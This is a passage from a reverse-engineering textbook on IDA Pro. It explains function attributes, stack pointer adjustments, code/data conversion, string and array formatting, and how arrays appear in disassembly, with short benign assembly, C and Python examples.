An alternative means for changing the name of a function.

Start address

The address of the first instruction in the function. IDA most often deter-

mines this automatically, either during analysis or from the address used

during the create function operation.

Figure 7-7: Function editing dialog

End address

The address following the last instruction in the function. Most fre-

quently, this is the address of the location that follows the function’s

return instruction. In most cases, this address is determined automati-

cally during the analysis phase or as part of function creation. In cases

where IDA has trouble determining the true end of a function, you may

need to edit this value manually. Remember, this address is not actually

part of the function but follows the last instruction in the function.

Local variables area

This represents the number of stack bytes dedicated to local variables

(see Figure 6-4) for the function. In most cases, this value is computed

automatically based on analysis of stack pointer behavior within the

function.

Saved registers

This is the number of bytes used to save registers (see Figure 6-4) on

behalf of the caller. IDA considers the saved register region to lie on top

of the saved return address and below any local variables associated with

the function. Some compilers choose to save registers on top of a func-

tion’s local variables. IDA considers the space required to save such regis-

ters as belonging to the local variable area rather than a dedicated saved

registers area.

Purged bytes

Purged bytes shows the number of bytes of parameters that a function

removes from the stack when it returns to its caller. For cdecl functions,

this value is always zero. For stdcall functions, this value represents the

amount of space consumed by any parameters that are passed on the

stack (see Figure 6-4). In x86 programs, IDA can automatically determine

this value when it observes the use of the RET N variant of the return

instruction.

Frame pointer delta

In some cases, compilers may adjust a function’s frame pointer to point

somewhere into the middle of the local variable area rather than at the

saved frame pointer at the bottom of the local variable area. This distance

from the adjusted frame pointer to the saved frame pointer is termed the

frame pointer delta. In most cases any frame pointer delta will be computed

automatically when the function is analyzed. Compilers utilize a frame

pointer delta as a speed optimization. The purpose of the delta is to keep

as many stack frame variables as possible within reach of a 1-byte signed

offset (–128..+127) from the frame pointer.
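The benefit of a frame pointer delta can be checked with a little arithmetic. In the following Python sketch, offsets are measured from the saved frame pointer, local variables occupy the negative offsets just below it, and the frame pointer sits delta bytes below the saved frame pointer. The function name and this simplified frame model are assumptions made for illustration; the sketch counts only local variable bytes and ignores arguments.

```python
def reachable_local_bytes(local_size, delta):
    """Count local-variable bytes addressable with a 1-byte signed offset.

    Locals occupy offsets [-local_size, -1] relative to the saved frame
    pointer; the frame pointer itself points at offset -delta.
    """
    lowest = max(-local_size, -delta - 128)   # farthest byte below the pointer
    highest = min(-1, -delta + 127)           # farthest byte above the pointer
    return max(0, highest - lowest + 1)


for delta in (0, 0x80):
    count = reachable_local_bytes(0x200, delta)
    print(f"delta={delta:#x}: {count} of {0x200} local bytes in reach")
```

With a 200h-byte local variable area, moving the frame pointer 80h bytes into the locals doubles the number of local bytes that a 1-byte displacement can address in this model, from 128 to 256.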

Additional attribute checkboxes are available to further characterize the

function. As with other fields within the dialog, these checkboxes generally

reflect the results of IDA’s automatic analysis. The following attributes can be

toggled on and off.

Does not return

The function does not return to its caller. When such a function is called,

IDA does not assume that execution continues following the associated

call instruction.

Far function

Used to mark a function as a far function on segmented architectures.

Callers of the function would need to specify both a segment and an

offset value when calling the function. The need to use far calls is typically

dictated by the memory model in use within a program rather than by

the fact that the architecture supports segmentation, for example, the

use of the large (as opposed to flat) memory model on an x86.

Library func

Flags a function as library code. Library code might include support

routines included by a compiler or functions that are part of a statically

linked library. Marking a function as a library function causes the function

to be displayed using the assigned library function coloring to distinguish

it from nonlibrary code.

Static func

Does nothing other than display the static modifier in the function’s

attribute list.

BP based frame

Indicates that the function utilizes a frame pointer. In most cases IDA

determines this automatically by analyzing the function’s prologue. If

analysis fails to recognize that a frame pointer is used in the given func-

tion, you can manually select this attribute. If you do manually select

this attribute, make sure that you adjust the saved register size (usually

increased by the size of the saved frame pointer) and local variable size

(usually decreased by the size of the saved frame pointer) accordingly.

For frame pointer–based frames, memory references that make use of

the frame pointer are formatted to make use of symbolic stack variable

names rather than numeric offsets. If this attribute is not set, then stack

frame references are assumed to be relative to the stack pointer register.

BP equals to SP

Some functions configure the frame pointer to point to the top of the

stack frame (along with the stack pointer) upon entering a function.

This attribute should be set in such cases. This is essentially the same as

having a frame pointer delta equal in size to the local variable area.

Stack Pointer Adjustments

As we mentioned previously, IDA makes every effort to track changes to the

stack pointer at each instruction within a function. The accuracy that IDA

manages to achieve in doing so significantly impacts the accuracy of the

function’s stack frame layout. When IDA is unable to determine whether an

instruction alters the stack pointer, you may find that you need to specify a

manual stack pointer adjustment.

The most straightforward example of such a case occurs when one func-

tion calls another function that makes use of the stdcall calling convention.

If the function being called resides in a shared library that IDA does not

have knowledge of (IDA ships with knowledge of the signatures and calling

conventions of many common library functions), then IDA will be unaware

that the function utilizes stdcall and will fail to account for the fact that the

stack pointer will have been modified by the called function prior to return-

ing. Thus, IDA will reflect an inaccurate value for the stack pointer for the

remainder of the function. The following function call sequence, in which

some_imported_func resides in a shared library, demonstrates this problem

(note that the stack pointer line part option has been turned on):

.text:004010EB 01C push eax

.text:004010F3 020 push 2

.text:004010FB 024 push 1

➋.text:00401102 028 call some_imported_func

.text:00401107 ➊028 mov ebx, eax

Since some_imported_func uses stdcall, it cleans the three parameters from

the stack as it returns, and the correct stack pointer value at ➊ should be 01C.

One way to fix this problem is to associate a manual stack adjustment with

the instruction at ➋. Stack adjustments can be added by highlighting the

address to which the adjustment applies, selecting Edit ▸ Functions ▸ Change

Stack Pointer (hotkey ALT-K), and specifying the number of bytes by which

the stack pointer changes, in this case 12.

While the previous example serves to illustrate a point, there is a

better solution to this particular problem. Consider the case in which

some_imported_func is called many different times. In that case, we would

need to make the stack adjustment we just made at each location from which

some_imported_func is called. Clearly this could be very tedious, and we might

miss something. The better solution is to educate IDA regarding the behav-

ior of some_imported_func. Because we are dealing with an imported function,

when we attempt to navigate to it, we eventually end up at the import table

entry for that function, which looks something like the following entry:

.idata:00418078 ; Segment type: Externs

.idata:00418078 ; _idata

.idata:00418078 extrn some_imported_func:dword ; DATA XREF: sub_401034↑r

Even though this is an imported function, IDA allows you to edit one

piece of information concerning its behavior: the number of purged bytes

associated with the function. By editing this function, you can specify the

number of bytes that it clears off the stack when it returns, and IDA will

propagate the information that you supply to every location that calls the

function, instantly correcting the stack pointer computations at each of

those locations.
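The difference between patching each call site and recording the purged bytes once can be sketched in Python. The helper name, the dictionary layout, and the second call site are hypothetical; only the first call site (address 00401102, stack pointer value 028) comes from the listing above.

```python
def sp_after_calls(call_sites, purged_bytes):
    """Map each call-site address to the stack delta right after the call.

    call_sites:   address -> (callee name, stack delta shown at the call)
    purged_bytes: callee name -> bytes the callee removes when it returns
    """
    result = {}
    for address, (callee, sp_at_call) in call_sites.items():
        # A callee with no recorded purge is assumed to leave the stack alone.
        result[address] = sp_at_call - purged_bytes.get(callee, 0)
    return result


call_sites = {
    0x00401102: ("some_imported_func", 0x28),
    0x00401234: ("some_imported_func", 0x30),   # hypothetical second call
}

unknown = sp_after_calls(call_sites, {})
fixed = sp_after_calls(call_sites, {"some_imported_func": 12})

for address in call_sites:
    print(f"{address:08X}: {unknown[address]:03X} -> {fixed[address]:03X}")
```

A single entry in the purged-bytes table corrects every call site at once, which is the effect the text describes when the attribute is set on the imported function itself.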

In order to improve its automated analysis, IDA incorporates advanced

techniques that attempt to resolve stack pointer discrepancies by solving a

system of linear equations related to the behavior of the stack pointer. As

a result, you may not even realize that IDA has no prior knowledge of the

details of functions such as some_imported_func. For more information on

these techniques, refer to Ilfak’s blog post titled “Simplex method in IDA

Pro” at http://hexblog.com/2006/06/.

Converting Data to Code (and Vice Versa)

During the automatic analysis phase, bytes are occasionally categorized incor-

rectly. Data bytes may be incorrectly classified as code bytes and disassembled

into instructions, or code bytes may be incorrectly classified as data bytes and

formatted as data values. This happens for many reasons, including the fact

that some compilers embed data into the code section of programs or the

fact that some code bytes are never directly referenced as code and IDA opts

not to disassemble them. Obfuscated programs in particular tend to blur the

distinction between code sections and data sections.

Regardless of the reason that you wish to reformat your disassembly,

doing so is fairly easy. The first option for reformatting anything is to remove

its current formatting (code or data). It is possible to undefine functions,

code, or data by right-clicking the item that you wish to undefine and selecting

Undefine (also Edit ▸ Undefine or hotkey U) from the resulting context-sensitive

menu. Undefining an item causes the underlying bytes to be reformatted

as a list of raw byte values. Large regions can be undefined by using a

click-and-drag operation to select a range of addresses prior to performing

the undefine operation. As an example, consider the simple function listing

that follows:

.text:004013E0 sub_4013E0 proc near

.text:004013E0 push ebp

.text:004013E1 mov ebp, esp

.text:004013E3 pop ebp

.text:004013E4 retn

.text:004013E4 sub_4013E0 endp

Undefining this function would yield the series of uncategorized bytes

shown here, which we could choose to reformat in virtually any manner:

.text:004013E0 unk_4013E0 db 55h ; U

.text:004013E1 db 89h ; ë

.text:004013E2 db 0E5h ; s

.text:004013E3 db 5Dh ; ]

.text:004013E4 db 0C3h ; +
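The raw-byte view above is simply the function's machine code printed one byte per line. A short Python sketch makes the correspondence explicit; the helper name as_raw_bytes is invented for this example, and the sketch leaves out the unk_ label and the character comments that IDA adds.

```python
def as_raw_bytes(start, data, segment=".text"):
    """Format bytes as one 'db' line per address (illustrative only)."""
    lines = []
    for offset, byte in enumerate(data):
        text = format(byte, "X")
        if text[0] in "ABCDEF":
            text = "0" + text      # hex constants need a leading digit
        if byte >= 10:
            text += "h"            # single decimal digits need no suffix
        lines.append(f"{segment}:{start + offset:08X} db {text}")
    return lines


# push ebp ; mov ebp, esp ; pop ebp ; retn
code = bytes([0x55, 0x89, 0xE5, 0x5D, 0xC3])
lines = as_raw_bytes(0x004013E0, code)
print("\n".join(lines))
```

Nothing about the bytes changes when an item is undefined; only the interpretation that the display applies to them is discarded.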

To disassemble a sequence of undefined bytes, right-click the first byte

to be disassembled and select Code (also Edit ▸ Code or hotkey C). This

causes IDA to disassemble all bytes until it encounters a defined item or an

illegal instruction. Large regions can be converted to code by using a click-

and-drag operation to select a range of addresses prior to performing the

code-conversion operation.

The complementary operation of converting code to data is a little more

complex. First, it is not possible to convert code to data using the context

menu. Available alternatives include Edit ▸ Data and the D hotkey. Bulk

conversions of instructions to data are easiest to accomplish by first undefining all

of the instructions that you wish to convert to data and then formatting the

data appropriately. Basic data formatting is discussed in the following section.

Basic Data Transformations

Properly formatted data can be as important in developing an understanding

of a program’s behavior as properly formatted code. IDA takes information

from a variety of sources and uses many algorithms in order to determine the

most appropriate way to format data within a disassembly. A few examples

serve to illustrate how data formats are selected.

1. Datatypes and/or sizes can be inferred from the manner in which registers

are used. An instruction observed to load a 32-bit register from memory

implies that the associated memory location holds a 4-byte datatype

(though we may not be able to distinguish between a 4-byte integer and

a 4-byte pointer).

2. Function prototypes can be used to assign datatypes to function param-

eters. IDA maintains a large library of function prototypes for exactly this

purpose. Analysis is performed on the parameters passed to functions

in an attempt to tie a parameter to a memory location. If such a relation-

ship can be uncovered, then a datatype can be applied to the associated

memory location. Consider a function whose single parameter is a pointer

to a CRITICAL_SECTION (a Windows API datatype). If IDA can deter-

mine the address passed in a call to this function, then IDA can flag that

address as a CRITICAL_SECTION object.

3. Analysis of a sequence of bytes can reveal likely datatypes. This is precisely

what happens when a binary is scanned for string content. When long

sequences of ASCII characters are encountered, it is not unreasonable

to assume that they represent character arrays.

In the next few sections we discuss some basic transformations that you

can perform on data within your disassemblies.

Specifying Data Sizes

The simplest way to modify a piece of data is to adjust its size. IDA offers

a number of data size/type specifiers. The most commonly encountered

specifiers are db, dw, and dd, representing 1-, 2-, and 4-byte data, respectively.

The first way to change a data item’s size is via the Options ▸ Setup Data Types

dialog shown in Figure 7-8.

There are two parts to this dialog. The left side of the dialog contains a
column of buttons used to immediately change the data size of the currently
selected item. The right side of the dialog contains a column of checkboxes used
to configure what IDA terms the data carousel. Note that for each button on
the left, there is a corresponding checkbox on the right. The data carousel is a
revolving list of datatypes that contains only those types whose checkboxes are
selected. Modifying the contents of the data carousel has no immediate impact
on the IDA display. Instead, each type on the data carousel is listed on the
context-sensitive menu that appears when you right-click a data item. Thus, it is
easier to reformat data to a type listed in the data carousel than to a type not
listed in the data carousel. Given the datatypes selected in Figure 7-8,
right-clicking a data item would offer you the opportunity to reformat that item
as byte, word, or double-word data.

Figure 7-8: The datatype setup dialog

The name for the data carousel derives from the behavior of the asso-

ciated data formatting hotkey: D. When you press D, the item at the currently

selected address is reformatted to the next type in the data carousel list. With

the three-item list specified previously, an item currently formatted as db

toggles to dw, an item formatted as dw toggles to dd, and an item formatted as

dd toggles back to db to complete the circuit around the carousel. Using the

data hotkey on a nondata item such as code causes the item to be formatted

as the first datatype in the carousel list (db in this case).
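The carousel behavior just described is a wrap-around walk through a list. The Python sketch below captures it; the function name is hypothetical, and the treatment of a datatype that is not on the carousel (it is handled like a nondata item) is an assumption rather than documented IDA behavior.

```python
def next_data_type(current, carousel):
    """Return the type an item takes after one press of the D hotkey."""
    if current not in carousel:
        # Code and other nondata items start at the front of the carousel.
        return carousel[0]
    position = carousel.index(current)
    return carousel[(position + 1) % len(carousel)]


carousel = ["db", "dw", "dd"]

item = "code"
for _ in range(4):
    following = next_data_type(item, carousel)
    print(f"{item} -> {following}")
    item = following
```

Adding or removing checkboxes in the dialog corresponds to editing the carousel list; the cycling rule itself stays the same.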

Toggling through datatypes causes data items to grow, shrink, or remain

the same size. If an item’s size remains the same, then the only observable

change is in the way the data is formatted. If you reduce an item’s size, from

dd (4 bytes) to db (1 byte) for example, any extra bytes (3 in this case) become

undefined. If you increase the size of an item, IDA complains if the bytes fol-

lowing the item are already defined and asks you, in a roundabout way, if you

want IDA to undefine the next item in order to expand the current item.

The message you encounter in such cases is “Directly convert to data?” This

message generally means that IDA will undefine a sufficient number of suc-

ceeding items to satisfy your request. For example, when converting byte

data (db) to double-word data (dd), 3 additional bytes must be consumed to

form the new data item.

Datatypes and sizes can be specified for any location that describes data,

including stack variables. To change the size of stack-allocated variables,

open the detailed stack frame view by double-clicking the variable you wish

to modify; then change the variable’s size as you would any other variable.

Working with Strings

IDA recognizes a large number of string formats. By default, IDA searches

for and formats C-style null-terminated strings. To force data to be converted

to a string, utilize the options on the Edit ▸ Strings menu to select a specific

string style. If the bytes beginning at the currently selected address form a

string of the selected style, IDA groups those bytes together into a single string

variable. At any time, you can use the A hotkey to format the currently selected

location in the default string style.

Two dialogs are responsible for the configuration of string data. The first,

shown in Figure 7-9, is accessed via Options ▸ ASCII String Style, though

ASCII in this case is a bit of a misnomer, as a much wider variety of string

styles are understood.

Similar to the datatype configuration dialog, the buttons on the left are

used to create a string of the specified style at the currently selected location.

A string is created only if the data at the current location conforms to the

specified string format. For Character terminated strings, up to two termination

characters can be specified toward the bottom of the dialog. The radio buttons

on the right of the dialog are used to specify the default string style associ-

ated with the use of the strings hotkey (A).

Figure 7-9: String data configuration

The second dialog used to configure string operations is the Options ▸

General dialog, shown in Figure 7-10, where the Strings tab allows configuration

of additional strings-related options. While you can specify the default

string type here as well using the available drop-down box, the majority of

available options deal with the naming and display of string data, regardless

of their type. The Name generation area on the right of the dialog is visible

only when the Generate names option is selected. When name generation is

turned off, string variables are given dummy names beginning with the asc_

prefix.

Figure 7-10: IDA Strings options

When name generation is enabled, the Name generation options control

how IDA generates names for string variables. When Generate serial names is

not selected (the default), the specified prefix is combined with characters

taken from the string to generate a name that does not exceed the current

maximum name length. An example of such a name appears here:

.rdata:00402069 aThisIsACharact db 'This is a Character array',0

Title case is used in the name, and any characters that are not legal to

use within names (such as spaces) are omitted when forming the name.

The Mark as autogenerated option causes generated names to appear in a

different color (dark blue by default) than user-specified names (blue by

default). Preserve case forces the name to use characters as they appear

within the string rather than converting them to title case. Finally, Generate

serial names causes IDA to serialize names by appending numeric suffixes

(beginning with Number). The number of digits in generated suffixes is

controlled by the Width field. As configured in Figure 7-10, the first three

names to be generated would be a000, a001, and a002.
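The non-serial naming behavior described above can be approximated in a few lines of C. This is only a sketch of the documented behavior, not IDA's actual implementation: the function name make_string_name, the choice of letters, digits, and underscores as the only legal name characters, and the explicit max_len parameter are all assumptions made for illustration.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: build a name from a prefix plus the string's
 * characters, capitalizing the first character of each word and dropping
 * characters that are not legal in a name. At most max_len characters are
 * written, followed by a NUL (out must hold max_len + 1 bytes). */
void make_string_name(const char *prefix, const char *str,
                      size_t max_len, char *out) {
    size_t n;
    int start_of_word = 1;
    assert(prefix != NULL && str != NULL && out != NULL);

    n = strlen(prefix);
    if (n > max_len) {
        n = max_len;
    }
    memcpy(out, prefix, n);

    for (; *str != '\0' && n < max_len; str++) {
        unsigned char c = (unsigned char)*str;
        if (isalnum(c) || c == '_') {
            out[n++] = (char)(start_of_word ? toupper(c) : c);
            start_of_word = 0;
        } else {
            start_of_word = 1;   /* illegal characters are skipped */
        }
    }
    out[n] = '\0';
}
```

With a prefix of a and a limit of 15 characters (the length of the name in the listing above; the real limit is whatever maximum name length is configured), the string 'This is a Character array' yields aThisIsACharact.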

Specifying Arrays

One of the drawbacks to disassembly listings derived from higher-level lan-

guages is that they provide very few clues regarding the size of arrays. In a

disassembly listing, specifying an array can require a tremendous amount

of space if each item in the array is specified on its own disassembly line.

The following listing shows data declarations that follow the named variable

unk_402060. The fact that only the first item in the listing is referenced by any

instructions suggests that it may be the first element in an array. Rather than

being referenced directly, additional elements within arrays are often refer-

enced using more complex index computations to offset from the beginning

of the array.

.rdata:00402060 unk_402060 db 0 ; DATA XREF: sub_401350+8↑o

.rdata:00402060 ; sub_401350+18↑o

.rdata:00402061 db 0

.rdata:00402062 db 0

.rdata:00402063 db 0

.rdata:00402064 db 0

.rdata:00402065 db 0

.rdata:00402066 db 0

.rdata:00402067 db 0

.rdata:00402068 db 0

.rdata:00402069 db 0

.rdata:0040206A db 0

IDA provides facilities for grouping consecutive data definitions together

into a single array definition. To create an array, select the first element of the

array (we chose unk_402060) and use Edit ▸ Array to launch the array-creation

dialog shown in Figure 7-11. If a data item has been defined at a given location,

then an Array option will be available when you right-click the item. The type

of array to be created is dictated by the datatype associated with the item

selected as the first item in the array. In this case we are creating an array of

bytes.

Figure 7-11: Array-creation dialog

NOTE Prior to creating an array, make sure that you select the proper size for array elements by

changing the size of the first item in the array to the appropriate value.

Following are descriptions of useful fields for array creation:

Array element width

This value indicates the size of an individual array element (1 byte in this

case) and is dictated by the size of the data value that was selected when

the dialog was launched.

Maximum possible size

This value is automatically computed as the maximum number of

elements (not bytes) that can be included in the array before another

defined data item is encountered. Specifying a larger size may be possible

but will require succeeding data items to be undefined in order to absorb

them into the array.

Number of elements

This is where you specify the exact size of the array. The total number of

bytes occupied by the array can be computed as Number of elements ×

Array element width.

Items on a line

Specifies the number of elements to be displayed on each disassembly

line. This can be used to reduce the amount of space required to display

the array.

Element width

This value is for formatting purposes only and controls the column width

when multiple items are displayed on a single line.

Use “dup” construct

This option causes identical data values to be grouped into a single item

with a repetition specifier.

Signed elements

Dictates whether data is displayed as signed or unsigned values.

Display indexes

Causes array indexes to be displayed as regular comments. This is useful

if you need to locate specific data values within large arrays. Selecting

this option also enables the Indexes radio buttons so you can choose the

display format for each index value.

Create as array

Not checking this may seem to go against the purpose of the dialog, and

it is usually left checked. Uncheck it if your goal is simply to specify some

number of consecutive items without grouping them into an array.

Accepting the options specified in Figure 7-11 results in the following

compact array declaration, which can be read as an array of bytes (db) named

byte_402060 consisting of the value 0 repeated 416 (1A0h) times.

.rdata:00402060 byte_402060 db 1A0h dup(0) ; DATA XREF: sub_401350+8↑o

.rdata:00402060 ; sub_401350+18↑o

The net effect is that 416 lines of disassembly have been condensed to a

single line (largely due to the use of dup). In the next chapter we will discuss

the creation of arrays within stack frames.
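The dup construct is essentially a run-length encoding of identical array elements. As a rough illustration (the helper names below are hypothetical and are not part of IDA), the following C sketch counts the run of identical bytes at the start of a buffer and formats it in the style of the listing above. It does not add the leading 0 that assemblers expect when a hexadecimal constant begins with a letter.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Count how many bytes at the start of buf share the value of buf[0]. */
size_t leading_run(const unsigned char *buf, size_t len) {
    size_t n = 0;
    assert(buf != NULL);
    while (n < len && buf[n] == buf[0]) {
        n++;
    }
    return n;
}

/* Format a run as "db <count>h dup(<value>)"; returns snprintf's result. */
int format_dup(char *out, size_t out_size, size_t count, unsigned value) {
    assert(out != NULL);
    return snprintf(out, out_size, "db %zXh dup(%u)", count, value);
}
```

For a buffer of 416 zero bytes, leading_run reports 416 and format_dup produces the text db 1A0h dup(0).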

Summary

Together with the previous chapter, this chapter encompasses the most com-

mon operations that IDA users will ever need to perform. Through the use

of database modifications, you will combine your own knowledge with the

knowledge imparted by IDA during its analysis phase to produce much more

useful databases. As with source code, the effective use of names, assignment

of datatypes, and detailed comments will not only assist you in remembering

what you have analyzed but will also greatly assist others who may be required

to make use of your work. In the next chapter we continue to drill into IDA’s

capabilities by taking a look at how to deal with more complex data structures,

such as those represented by the C struct, and go on to examine some of the

low-level details of compiled C++.

DATATYPES AND DATA STRUCTURES

The low-hanging fruit in understanding the

behavior of binary programs lies in catalog-

ing the library functions that the program calls.

A C program that calls the connect function is creating a

network connection. A Windows program that calls

RegOpenKey is accessing the Windows registry. Additional analysis is required,

however, to gain an understanding of how and why these functions are called.

Discovering how a function is called requires learning what parameters

are passed to the function. In the case of a connect call, beyond the simple

fact that the function is being called, it is important to know exactly what net-

work address the program is connecting to. Understanding the data that is

being passed into functions is the key to reverse engineering a function’s sig-

nature (the number, type, and sequence of parameters required by the func-

tion) and, as such, points out the importance of understanding how datatypes

and data structures are manipulated at the assembly language level.

In this chapter we will examine how IDA conveys datatype information

to the user, how data structures are stored in memory, and how data within

those data structures is accessed. The simplest method for associating a spe-

cific datatype with a variable is to observe the use of the variable as a parame-

ter to a function that we know something about. During its analysis phase,

IDA makes every effort to annotate datatypes when they can be deduced

based on a variable’s use with a function for which IDA possesses a prototype.

When possible, IDA will go as far as using a formal parameter name lifted

from a function prototype rather than generating a default dummy name for

the variable. This can be seen in the following disassembly of a call to connect:

.text:004010F3 push 10h ; namelen
.text:004010F5 lea ecx, ➊[ebp+name]
.text:004010F8 push ecx ; name
.text:004010F9 mov edx, ➊[ebp+s]
.text:004010FF push edx ; s
.text:00401100 call connect

In this listing we can see that each push has been commented with the
name of the parameter that is being pushed (taken from IDA’s knowledge of
the function prototype). In addition, two local stack variables ➊ have been
named for the parameters that they correspond to. In most cases, these
names will be far more informative than the dummy names that IDA would
otherwise generate.
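For orientation, C source along the following lines would lead to a call sequence like the one above. This is a sketch, not the program that was actually disassembled: the helper names make_name and connect_to and the use of POSIX headers (a Windows program would use the Winsock headers instead) are assumptions. Note that the namelen value of 10h (16) matches the size of an IPv4 struct sockaddr_in on common platforms, and that the arguments are pushed right to left, which is why namelen is pushed first and s last.

```c
#include <assert.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Hypothetical helper: fill in the IPv4 address structure whose address
 * is later passed as connect()'s second (name) argument. Returns 1 on
 * success, which is inet_pton's success value. */
int make_name(struct sockaddr_in *name, const char *ip, unsigned short port) {
    assert(name != NULL && ip != NULL);
    memset(name, 0, sizeof(*name));
    name->sin_family = AF_INET;
    name->sin_port = htons(port);            /* network byte order */
    return inet_pton(AF_INET, ip, &name->sin_addr);
}

/* The call itself; the three arguments are s, name, and namelen. */
int connect_to(int s, const struct sockaddr_in *name) {
    return connect(s, (const struct sockaddr *)name,
                   (socklen_t)sizeof(*name));
}
```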

IDA’s ability to propagate type information from function prototypes is

not limited to library functions contained in IDA’s type libraries. IDA can

propagate formal parameter names and data types from any function in your

database as long as you have explicitly set the function’s type information.

Upon initial analysis, IDA assigns dummy names and the generic type int to

all function arguments, unless through type propagation it has reason to do

otherwise. In any case, you must set a function’s type by using the Edit ▸

Functions ▸ Set Function Type command, by right-clicking a function name

and choosing Set Function Type on the context menu, or by using the Y hotkey.

For the function shown below, this results in the dialog shown in Figure 8-1,

in which you may enter the function’s correct prototype.

.text:00401050 ; ======== S U B R O U T I N E =========================

.text:00401050

.text:00401050 ; Attributes: bp-based frame

.text:00401050

.text:00401050 foo proc near ; CODE XREF: demo_stackframe+2A↓p

.text:00401050

.text:00401050 arg_0 = dword ptr 8

.text:00401050 arg_4 = dword ptr 0Ch

.text:00401050

.text:00401050 push ebp

.text:00401051 mov ebp, esp

As shown below, IDA assumes an int return type, correctly deduces that

the cdecl calling convention is used based on the type of ret instruction used,

incorporates the name of the function as we have modified it, and assumes

all parameters are of type int. Because we have not yet modified the argu-

ment names, IDA displays only their types.

Figure 8-1: Setting a function’s type

If we modify the prototype to read int __cdecl foo(float f, char *ptr),
IDA will automatically insert a prototype comment ➊ for the function and
change the argument names ➋ in the disassembly as shown below.

.text:00401050 ; ======== S U B R O U T I N E =========================
.text:00401050
.text:00401050 ; Attributes: bp-based frame
.text:00401050
.text:00401050 ➊; int __cdecl foo(float f, char *ptr)
.text:00401050 foo proc near ; CODE XREF: demo_stackframe+2A↓p
.text:00401050
.text:00401050 ➋f = dword ptr 8
.text:00401050 ➋ptr = dword ptr 0Ch
.text:00401050
.text:00401050 push ebp
.text:00401051 mov ebp, esp

Finally, IDA propagates this information to all callers of the newly modified
function, resulting in improved annotation of all related function calls
as shown here. Note that the argument names f and ptr have been propagated
out as comments ➌ in the calling function and used to rename variables ➍
that formerly used dummy names.

.text:004010AD mov eax, [ebp+➍ptr]
.text:004010B0 mov [esp+4], eax ➌; ptr
.text:004010B4 mov eax, [ebp+➍f]
.text:004010B7 mov [esp], eax ➌; f
.text:004010BA call foo

Returning to imported library functions, it is often the case that IDA will
already know the prototype of the function. In such cases, you can easily view
the prototype by holding the mouse over the function name.¹ When IDA has
no knowledge of a function’s parameter sequence, it should, at a minimum,
know the name of the library from which the function was imported (see the
Imports window). When this happens, your best resources for learning the
behavior of the function are any associated man pages or other available API
documentation (such as MSDN online²). When all else fails, remember the
adage: Google is your friend.

1. Holding the mouse over any name in the IDA display causes a tool tip–style pop-up window to
be displayed that shows up to 10 lines of disassembly at the target location. In the case of library
function names, this often includes the prototype for calling the library function.

For the remainder of this chapter, we will be discussing how to recognize

when data structures are being used in a program, how to decipher the orga-

nizational layout of such structures, and how to use IDA to improve the read-

ability of a disassembly when such structures are in use. Since C++ classes are

a complex extension of C structures, the chapter concludes with a discussion

of reverse engineering compiled C++ programs.

Recognizing Data Structure Use

While primitive datatypes are often a natural fit with the size of a CPU’s regis-

ters or instruction operands, composite datatypes such as arrays and structures

typically require more complex instruction sequences in order to access the

individual data items that they contain. Before we can discuss IDA’s features

for improving the readability of code that utilizes complex datatypes, we

need to review what that code looks like.

Array Member Access

Arrays are the simplest composite data structure in terms of memory layout.

Traditionally, arrays are contiguous blocks of memory that contain consecu-

tive elements of the same datatype. The size of an array is easy to compute, as

it is the product of the number of elements in the array and the size of each

element. Using C notation, the minimum number of bytes consumed by the

following array

int array_demo[100];

is computed as

int bytes = 100 * sizeof(int);
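The same relationship can be checked directly in C. The short sketch below (the function names are illustrative only) uses sizeof to obtain the array's total size and then divides by the element size to recover the element count, which is the same division applied later in this chapter to sizes recovered from a disassembly.

```c
#include <assert.h>
#include <stddef.h>

int array_demo[100];

/* Total bytes occupied by array_demo: element count times element size. */
size_t array_demo_bytes(void) {
    return sizeof(array_demo);
}

/* Recover an element count by dividing total size by element size. */
size_t element_count(size_t total_bytes, size_t element_size) {
    assert(element_size != 0);
    return total_bytes / element_size;
}
```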

Individual array elements are accessed by supplying an index value,

which may be a variable or a constant, as shown in these array references:

➊ array_demo[20] = 15; //fixed index into the array
for (int i = 0; i < 100; i++) {
➋     array_demo[i] = i; //varying index into the array
}

Assuming, for the sake of example, that sizeof(int) is 4 bytes, then the
first array access at ➊ accesses the integer value that lies 80 bytes into the
array, while the second array access at ➋ accesses successive integers at offsets
0, 4, 8, ..., 396 bytes into the array. The offset for the first array access can be
computed at compile time as 20 * 4. In most cases, the offset for the second
array access must be computed at runtime because the value of the loop
counter, i, is not fixed at compile time. Thus for each pass through the loop,
the product i * 4 must be computed to determine the exact offset into the
array. Ultimately, the manner in which an array element is accessed depends
not only on the type of index used but also on where the array happens to be
allocated within the program’s memory space.

2. Please see http://msdn.microsoft.com/library/.

Globally Allocated Arrays

When an array is allocated within the global data area of a program (within

the .data or .bss section, for example), the base address of the array is known

to the compiler at compile time. The fixed base address makes it possible for

the compiler to compute fixed addresses for any array element that is accessed

using a fixed index. Consider the following trivial program that accesses a

global array using both fixed and variable offsets:

int global_array[3];

int main() {

int idx = 2;

global_array[0] = 10;

global_array[1] = 20;

global_array[2] = 30;

global_array[idx] = 40;

}

This program disassembles to the following:

.text:00401000 _main proc near
.text:00401000
.text:00401000 idx = dword ptr -4
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 push ecx
.text:00401004 mov [ebp+idx], 2
.text:0040100B ➊mov dword_40B720, 10
.text:00401015 ➋mov dword_40B724, 20
.text:0040101F ➌mov dword_40B728, 30
.text:00401029 mov eax, [ebp+idx]
.text:0040102C ➍mov dword_40B720[eax*4], 40
.text:00401037 xor eax, eax
.text:00401039 mov esp, ebp
.text:0040103B pop ebp
.text:0040103C retn
.text:0040103C _main endp

While this program has only one global variable, the disassembly lines at
➊, ➋, and ➌ seem to indicate that there are three global variables. The
computation of an offset (eax * 4) at ➍ is the only thing that seems to hint at the
presence of a global array named dword_40B720, yet this is the same name as
the global variable found at ➊.

Based on the dummy names assigned by IDA, we know that the global
array is made up of the 12 bytes beginning at address 0040B720. During the
compilation process, the compiler has used the fixed indexes (0, 1, 2) to
compute the actual addresses of the corresponding elements in the array
(0040B720, 0040B724, and 0040B728), which are referenced using the global
variables at ➊, ➋, and ➌. Using IDA’s array-formatting operations discussed
in the last chapter (Edit ▸ Array), dword_40B720 can be formatted as a
three-element array yielding the alternate disassembly lines shown in the following
listing. Note that this particular formatting highlights the use of offsets into
the array:

.text:0040100B mov dword_40B720, 10
.text:00401015 mov dword_40B720+4, 20
.text:0040101F mov dword_40B720+8, 30

There are two points to note in this example. First, when constant
indexes are used to access global arrays, the corresponding array elements
